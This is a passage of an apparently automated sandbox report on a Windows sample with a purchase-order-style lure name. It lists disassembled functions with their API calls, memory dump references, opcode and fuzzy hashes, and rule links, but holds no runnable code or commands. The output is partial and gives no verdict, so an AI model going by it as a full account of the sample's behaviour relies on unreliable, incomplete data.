                        • Instruction Fuzzy Hash: B921B871600205AFEF164F64EC85EFB3BAEEB4D364F114628FA1497190CB31DCA29768
                        Function 002F9E65 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                        Download Yara Rule
                        APIs
                        • GetStdHandle.KERNEL32(0000000C), ref: 002F9E85
                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002F9EB6
                        • GetStdHandle.KERNEL32(0000000C), ref: 002F9EC8
                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002F9F02
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateHandle$FilePipe
                        • String ID: nul
                        • API String ID: 4209266947-2873401336
                        • Opcode ID: 77c7c779a875fb028a5e997fff8ad411e396676ce78c375fbbbb682523bfb42b
                        • Instruction ID: 40585f9893fca401b2ab033c710baa2254cd547cbc783352cd48059565f08493
                        • Opcode Fuzzy Hash: 77c7c779a875fb028a5e997fff8ad411e396676ce78c375fbbbb682523bfb42b
                        • Instruction Fuzzy Hash: 6921867051030A9FDB20DF25DC45BAAB7B8AF843A0F204A2AFAA5D71D0D77199A0CB50
                        Function 002FE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 002FE392
                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 002FE3E6
                        • __swprintf.LIBCMT ref: 002FE3FF
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0034DBF0), ref: 002FE43D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorMode$InformationVolume__swprintf
                        • String ID: %lu
                        • API String ID: 3164766367-685833217
                        • Opcode ID: 39957004149786dd1763f0dc007b6d54f46965d681bbb9f6b1a14700639fc38b
                        • Instruction ID: b9091bd913467580cc8fb2e0f4ea7ef8512288387251d9332300064c26dd1235
                        • Opcode Fuzzy Hash: 39957004149786dd1763f0dc007b6d54f46965d681bbb9f6b1a14700639fc38b
                        • Instruction Fuzzy Hash: E8214F35A40109AFCB10EFA4D885DEEBBB8EF59714F104069F509EB251D771EA15CF90
                        Function 002ED7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                          • Part of subcall function 002ED623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002ED640
                          • Part of subcall function 002ED623: GetWindowThreadProcessId.USER32(?,00000000), ref: 002ED653
                          • Part of subcall function 002ED623: GetCurrentThreadId.KERNEL32 ref: 002ED65A
                          • Part of subcall function 002ED623: AttachThreadInput.USER32(00000000), ref: 002ED661
                        • GetFocus.USER32 ref: 002ED7FB
                          • Part of subcall function 002ED66C: GetParent.USER32(?), ref: 002ED67A
                        • GetClassNameW.USER32(?,?,00000100), ref: 002ED844
                        • EnumChildWindows.USER32(?,002ED8BA), ref: 002ED86C
                        • __swprintf.LIBCMT ref: 002ED886
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                        • String ID: %s%d
                        • API String ID: 1941087503-1110647743
                        • Opcode ID: 16f14736592c8d5d739ccf9147c5e46e8047c63fb87501fff1b018d05ac1a474
                        • Instruction ID: d2a38366d62c0e9e9deba2e705db382b964666b63442853fa364ccfa5b5e0508
                        • Opcode Fuzzy Hash: 16f14736592c8d5d739ccf9147c5e46e8047c63fb87501fff1b018d05ac1a474
                        • Instruction Fuzzy Hash: F411E4755502056BDF11BF91DC86FEA376DAF44704F4040B9FE0CAA186CBB499558F70
                        Function 002D8724 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __lock.LIBCMT ref: 002D8768
                          • Part of subcall function 002D8984: __mtinitlocknum.LIBCMT ref: 002D8996
                          • Part of subcall function 002D8984: EnterCriticalSection.KERNEL32(002D0127,?,002D876D,0000000D), ref: 002D89AF
                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 002D8775
                        • __lock.LIBCMT ref: 002D8789
                        • ___addlocaleref.LIBCMT ref: 002D87A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                        • String ID: P3
                        • API String ID: 1687444384-1351901558
                        • Opcode ID: d10b4ab49c29126b973b30c0f50ec6f6596528bacb6eae08c715d7c3b76d2f92
                        • Instruction ID: a79c13351366972aa82d02cef66010760fb6eea8ab5f4975bf3c592abe1bd1b8
                        • Opcode Fuzzy Hash: d10b4ab49c29126b973b30c0f50ec6f6596528bacb6eae08c715d7c3b76d2f92
                        • Instruction Fuzzy Hash: C3016975425B009FE721EF75D80679AF7F0AF44325F20890EE0AA977A0DBB4AA50CF01
                        Function 00311836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                        Download Yara Rule
                        APIs
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003118E4
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00311917
                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00311A3A
                        • CloseHandle.KERNEL32(?), ref: 00311AB0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                        • String ID:
                        • API String ID: 2364364464-0
                        • Opcode ID: 630c2c9c2131e69da41466e4486355b8935bbc850f3d92e8b08a79aa1630d766
                        • Instruction ID: 58788749ad0d972bc1ac3ba7babe4db652511a0c9580c63ced2cf62f6a99996a
                        • Opcode Fuzzy Hash: 630c2c9c2131e69da41466e4486355b8935bbc850f3d92e8b08a79aa1630d766
                        • Instruction Fuzzy Hash: B3818670A50204ABDF259F64C886BEE7BF5AF48760F158059F905AF382DBB4E9508F90
                        Function 00310579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003105DF
                        • GetProcAddress.KERNEL32(00000000,?), ref: 0031066E
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0031068C
                        • GetProcAddress.KERNEL32(00000000,?), ref: 003106D2
                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 003106EC
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,002FAEA5,?,?,00000000,00000008), ref: 002CF282
                          • Part of subcall function 002CF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,002FAEA5,?,?,00000000,00000008), ref: 002CF2A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                        • String ID:
                        • API String ID: 327935632-0
                        • Opcode ID: e0a9900dea79edfdda8a7840ae04b3198dbbaf2c05f3fb4b10a5a1af423b3b57
                        • Instruction ID: b11e8f895e2ed6d8240cb9fbc40bb1c3237958f65a9ad840b708878da13a6604
                        • Opcode Fuzzy Hash: e0a9900dea79edfdda8a7840ae04b3198dbbaf2c05f3fb4b10a5a1af423b3b57
                        • Instruction Fuzzy Hash: 38516775A002059FCB09EFA8C8909EDB7B9EF4C310F158065E956AB352DB74ED95CF80
                        Function 00312D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 00313AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00312DE0
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00312E1F
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00312E66
                        • RegCloseKey.ADVAPI32(?,?), ref: 00312E92
                        • RegCloseKey.ADVAPI32(00000000), ref: 00312E9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                        • String ID:
                        • API String ID: 3440857362-0
                        • Opcode ID: a9cd4d9ce9137be0112059af28e062ad07239a263504de7ca4f8a50a1f655ab1
                        • Instruction ID: 9f541a46c18652b348de207428526e06dc8a8f74c6faa0223d3dd7904f40d7ab
                        • Opcode Fuzzy Hash: a9cd4d9ce9137be0112059af28e062ad07239a263504de7ca4f8a50a1f655ab1
                        • Instruction Fuzzy Hash: 4F519D31218205AFC709EF64C881EABB7E9FF88744F10481EF5958B2A1DB31E965CF52
                        Function 0031CB07 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6dcf7f8e8aa2b597d123e377cbd33e1ba24786fcf97d16222bcd300068def2e1
                        • Instruction ID: af3ca892c7bd691b754c968868966403fb2ac3f78454aa2f97d119a0f7c0b96e
                        • Opcode Fuzzy Hash: 6dcf7f8e8aa2b597d123e377cbd33e1ba24786fcf97d16222bcd300068def2e1
                        • Instruction Fuzzy Hash: 24413436954104BFC72ADB68CC89FE9BB68EB0D320F169255F819E72E0C7309D81D690
                        Function 00301726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                        Download Yara Rule
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003017D4
                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003017FD
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0030183C
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00301861
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00301869
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                        • String ID:
                        • API String ID: 1389676194-0
                        • Opcode ID: 0e0d2b300c7e6f651fd4bb3e2f7a3fa9eb359ecf6180009268e2da271b1715dc
                        • Instruction ID: 5299f45fca37106e3ff684cd6ea7444a665e8d21297b1ec499a6b5afd33ea865
                        • Opcode Fuzzy Hash: 0e0d2b300c7e6f651fd4bb3e2f7a3fa9eb359ecf6180009268e2da271b1715dc
                        • Instruction Fuzzy Hash: 06411935A10205DFCB15EF64C991EAEBBF9EF08350B148099E909AB362DB31ED11DF50
                        Function 002CB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(000000FF), ref: 002CB749
                        • ScreenToClient.USER32(00000000,000000FF), ref: 002CB766
                        • GetAsyncKeyState.USER32(00000001), ref: 002CB78B
                        • GetAsyncKeyState.USER32(00000002), ref: 002CB799
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: fbee247cfc4440a725ee688bf7bd3502f0c2d15d45bcb79c8bad95d7c40c620b
                        • Instruction ID: 739fb7f9b5fe32231817b0961d81a964f53e92f64c42638613caab1db8e43431
                        • Opcode Fuzzy Hash: fbee247cfc4440a725ee688bf7bd3502f0c2d15d45bcb79c8bad95d7c40c620b
                        • Instruction Fuzzy Hash: 08417F32504519FFDF1A9F64D885EE9FBB4BB45320F204319F829962D0C730A9A4DF90
                        Function 002EC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 002EC156
                        • PostMessageW.USER32(?,00000201,00000001), ref: 002EC200
                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002EC208
                        • PostMessageW.USER32(?,00000202,00000000), ref: 002EC216
                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002EC21E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: 5c0bb888605bea32272cf908f373212a155966b82bf5d848e29c80b452f5c953
                        • Instruction ID: afbf3cc3f44ac18db441387cc08c9285e0be72da329ef4ceea77cae0e6f57550
                        • Opcode Fuzzy Hash: 5c0bb888605bea32272cf908f373212a155966b82bf5d848e29c80b452f5c953
                        • Instruction Fuzzy Hash: B431F17190025AEBDF04CFB9DD4DA9E3BB5EF04315F604224F824AB1D1C3B09911DB90
                        Function 002EE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindowVisible.USER32(?), ref: 002EE9CD
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 002EE9EA
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 002EEA22
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 002EEA48
                        • _wcsstr.LIBCMT ref: 002EEA52
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                        • String ID:
                        • API String ID: 3902887630-0
                        • Opcode ID: 7cf2c1506797f346c1c1b5ffdc98af83f51cb4a5c9457baed9cc914ba0bcc007
                        • Instruction ID: ceaafb1587def7491a2c64d44a43be565564627c827bba815c59a10076187bd9
                        • Opcode Fuzzy Hash: 7cf2c1506797f346c1c1b5ffdc98af83f51cb4a5c9457baed9cc914ba0bcc007
                        • Instruction Fuzzy Hash: ED214971254240BBEF169F3AEC86E7B7BECEF45710F51803EF809CA2A1DA60DC608650
                        Function 0031DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 002CAF8E
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031DCC0
                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0031DCE4
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0031DCFC
                        • GetSystemMetrics.USER32(00000004), ref: 0031DD24
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0030407D,00000000), ref: 0031DD42
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Long$MetricsSystem
                        • String ID:
                        • API String ID: 2294984445-0
                        • Opcode ID: 808c0eb8ecebe468891cc483b4cb423e0e2eae6e85f5bd1ef1727d4ddb844c51
                        • Instruction ID: 9ee2b362642df33ed24d53c64384a1623e56ffe387ec59d412e30282f3b58788
                        • Opcode Fuzzy Hash: 808c0eb8ecebe468891cc483b4cb423e0e2eae6e85f5bd1ef1727d4ddb844c51
                        • Instruction Fuzzy Hash: CD21D872614211AFCB265F79AC84BA577A8FF4A375F110B34F936C65E0D7709890CB90
                        Function 002ECA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002ECA86
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002ECAB8
                        • __itow.LIBCMT ref: 002ECAD0
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002ECAF6
                        • __itow.LIBCMT ref: 002ECB07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend$__itow$_memmove
                        • String ID:
                        • API String ID: 2983881199-0
                        • Opcode ID: ec855ac267d555e9e14894308676ed7b3b96024384b077189ecccd145fcd780f
                        • Instruction ID: 4a9016ce4599720128af147087442923b45e904befae3e2a475404fb089eb689
                        • Opcode Fuzzy Hash: ec855ac267d555e9e14894308676ed7b3b96024384b077189ecccd145fcd780f
                        • Instruction Fuzzy Hash: FB213B72750644BBDB21EEE98C47EDE7AACDF49750F504038F905E7281D6B0CD1687A0
                        Function 002F6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B3B1E: _wcsncpy.LIBCMT ref: 002B3B32
                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 002F6DBA
                        • GetLastError.KERNEL32 ref: 002F6DC5
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 002F6DD9
                        • _wcsrchr.LIBCMT ref: 002F6DFB
                          • Part of subcall function 002F6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 002F6E31
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                        • String ID:
                        • API String ID: 3633006590-0
                        • Opcode ID: 6959808e588e32d9566319d6a3e981d110f2dd41b571f1eb0470ed86b58e8c12
                        • Instruction ID: 1d033824e5a44b7b0d1febdf1d0c845baef5f11113b886d46467c93d501f918b
                        • Opcode Fuzzy Hash: 6959808e588e32d9566319d6a3e981d110f2dd41b571f1eb0470ed86b58e8c12
                        • Instruction Fuzzy Hash: 9021EB7562131E96DB10AB74ED4EFFAB36CDF15390F200576E625C30D1EB20CDA49A50
